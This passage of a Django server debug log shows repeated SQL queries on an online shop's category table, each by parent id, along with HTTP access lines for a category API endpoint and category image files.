"shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 13:31:02,216 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-13 13:31:02,220 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-13 13:31:02,225 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-13 13:31:02,228 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-13 13:31:02,230 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-13 13:31:02,233 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-13 13:31:02,236 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-13 13:31:02,238 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-13 13:31:02,241 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-13 13:31:02,243 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-13 13:31:02,246 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-13 13:31:02,248 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-13 13:31:02,251 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-13 13:31:02,253 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-13 13:31:02,257 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-13 13:31:02,261 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-13 13:31:02,265 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-13 13:31:02,268 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-13 13:31:02,271 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-13 13:31:02,273 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-13 13:31:02,276 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-13 13:31:02,278 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-13 13:31:02,280 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-13 13:31:02,283 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-13 13:31:02,286 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-13 13:31:02,288 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-13 13:31:02,291 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-13 13:31:02,293 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-13 13:31:02,296 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-13 13:31:02,299 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-13 13:31:02,301 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-13 13:31:02,304 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-13 13:31:02,306 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-13 13:31:02,309 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-13 13:31:02,312 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-13 13:31:02,315 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-13 13:31:02,319 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-13 13:31:02,322 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-13 13:31:02,324 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-13 13:31:02,327 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-13 13:31:02,330 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-13 13:31:02,333 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-13 13:31:02,336 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-13 13:31:02,339 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-13 13:31:02,341 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [13/Dec/2019 13:31:02] "GET /api/v1/categories/ HTTP/1.0" 200 8596 [13/Dec/2019 13:31:02] "GET /media/categories/2019/12/13/collection10.png HTTP/1.0" 200 387799 [13/Dec/2019 13:31:02] "GET /media/categories/2019/12/13/collection6.png HTTP/1.0" 200 600645 [13/Dec/2019 13:31:02] "GET /media/categories/2019/12/13/collection6_4Q1Rpjs.png HTTP/1.0" 200 600645 [13/Dec/2019 13:31:03] "GET /media/categories/2019/12/13/popular3.png HTTP/1.0" 200 309908 [13/Dec/2019 13:31:03] "GET /media/categories/2019/12/13/collection4.png HTTP/1.0" 200 432480 [13/Dec/2019 13:31:03] "GET /media/categories/2019/12/13/collection3_blWHbYx.png HTTP/1.0" 200 784410 [13/Dec/2019 13:31:04] "GET /media/categories/2019/12/13/collection3_3c60jfJ.png HTTP/1.0" 200 784410 [13/Dec/2019 13:31:04] "GET /media/categories/2019/12/13/collection3.png HTTP/1.0" 200 784410 [13/Dec/2019 13:31:05] "GET /media/categories/2019/12/13/collection6_YoOFERO.png HTTP/1.0" 200 600645 [13/Dec/2019 13:31:05] "GET /media/categories/2019/12/07/collection2.png HTTP/1.0" 200 466113 [13/Dec/2019 13:31:05] "GET /media/categories/2019/12/07/collection3.png HTTP/1.0" 200 784410 [13/Dec/2019 13:31:05] "GET /media/categories/2019/12/13/collection3_lEyiVWB.png HTTP/1.0" 200 784410 [13/Dec/2019 13:31:06] "GET /media/categories/2019/12/13/collection3_pKohXg6.png HTTP/1.0" 200 784410 [13/Dec/2019 13:31:06] "GET /media/categories/2019/12/13/collection3_rYale9k.png HTTP/1.0" 200 784410 [13/Dec/2019 13:31:07] "GET /media/categories/2019/12/13/collection3_O3U2Kj1.png HTTP/1.0" 200 784410 [13/Dec/2019 13:31:07] "GET /media/categories/2019/12/07/collection7.png HTTP/1.0" 200 379075 [13/Dec/2019 13:31:07] "GET /media/categories/2019/12/13/collection7_sU2pbFG.png HTTP/1.0" 200 379075 [13/Dec/2019 13:31:07] "GET /media/categories/2019/12/13/collection7_s1gVgUK.png HTTP/1.0" 200 379075 [13/Dec/2019 13:31:08] "GET /media/categories/2019/12/13/collection7_zgKzb94.png HTTP/1.0" 200 379075 [13/Dec/2019 13:31:08] "GET /media/categories/2019/12/13/collection7_ZCM4YHI.png HTTP/1.0" 200 379075 [13/Dec/2019 13:31:08] "GET /media/categories/2019/12/13/collection7.png HTTP/1.0" 200 379075 [13/Dec/2019 13:31:09] "GET /media/categories/2019/12/07/collection4.png HTTP/1.0" 200 432480 [13/Dec/2019 13:31:09] "GET /media/categories/2019/12/13/collection4_klUHkrJ.png HTTP/1.0" 200 432480 [13/Dec/2019 13:31:09] "GET /media/categories/2019/12/13/collection4_45IbUzs.png HTTP/1.0" 200 432480 [13/Dec/2019 13:31:09] "GET /media/categories/2019/12/13/collection4_wmrC3xY.png HTTP/1.0" 200 432480 [13/Dec/2019 13:31:09] "GET /media/categories/2019/12/13/collection4_ykrPiOh.png HTTP/1.0" 200 432480 [13/Dec/2019 13:31:09] "GET /media/categories/2019/12/07/collection8.png HTTP/1.0" 200 376652 [13/Dec/2019 13:31:10] "GET /media/categories/2019/12/13/collection8_98NdtQd.png HTTP/1.0" 200 376652 [13/Dec/2019 13:31:10] "GET /media/categories/2019/12/13/collection8_MKX5n4Y.png HTTP/1.0" 200 376652 [13/Dec/2019 13:31:11] "GET /media/categories/2019/12/13/collection8_qT6o4Ze.png HTTP/1.0" 200 376652 [13/Dec/2019 13:31:11] "GET /media/categories/2019/12/13/collection8.png HTTP/1.0" 200 376652 [13/Dec/2019 13:31:11] "GET /media/categories/2019/12/07/collection5.png HTTP/1.0" 200 454674 [13/Dec/2019 13:31:11] "GET /media/categories/2019/12/13/collection5_NjJaGxE.png HTTP/1.0" 200 454674 [13/Dec/2019 13:31:11] "GET /media/categories/2019/12/13/collection5_DOY3fSw.png HTTP/1.0" 200 454674 [13/Dec/2019 13:31:11] "GET /media/categories/2019/12/13/collection5_J2Tl3z7.png HTTP/1.0" 200 454674 [13/Dec/2019 13:31:12] "GET /media/categories/2019/12/13/collection5_VsJvXmq.png HTTP/1.0" 200 454674 [13/Dec/2019 13:31:12] "GET /media/categories/2019/12/13/collection5.png HTTP/1.0" 200 454674 [13/Dec/2019 13:31:13] "GET /media/categories/2019/12/07/collection1.png HTTP/1.0" 200 793553 [13/Dec/2019 13:31:13] "GET /media/categories/2019/12/13/weapons2.png HTTP/1.0" 200 523712 [13/Dec/2019 13:31:13] "GET /media/categories/2019/12/07/collection9.png HTTP/1.0" 200 284188 [13/Dec/2019 13:31:13] "GET /media/categories/2019/12/13/weapons1.png HTTP/1.0" 200 700594 [13/Dec/2019 13:31:14] "GET /media/categories/2019/12/13/collection9.png HTTP/1.0" 200 284188 [13/Dec/2019 13:31:14] "GET /media/categories/2019/12/13/collection9_y5Aperx.png HTTP/1.0" 200 284188 DEBUG 2019-12-13 13:31:30,115 utils 11259 139831538779904 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 13:31:30,121 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-13 13:31:30,124 utils 11259 139831538779904 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-13 13:31:30,126 utils 11259 139831538779904 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-13 13:31:30,129 utils 11259 139831538779904 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-13 13:31:30,131 utils 11259 139831538779904 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-13 13:31:30,133 utils 11259 139831538779904 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-13 13:31:30,135 utils 11259 139831538779904 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-13 13:31:30,138 utils 11259 139831538779904 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-13 13:31:30,141 utils 11259 139831538779904 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-13 13:31:30,144 utils 11259 139831538779904 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-13 13:31:30,147 utils 11259 139831538779904 (0.000) SELECT "shop_category"."id", "shop_category"."name", 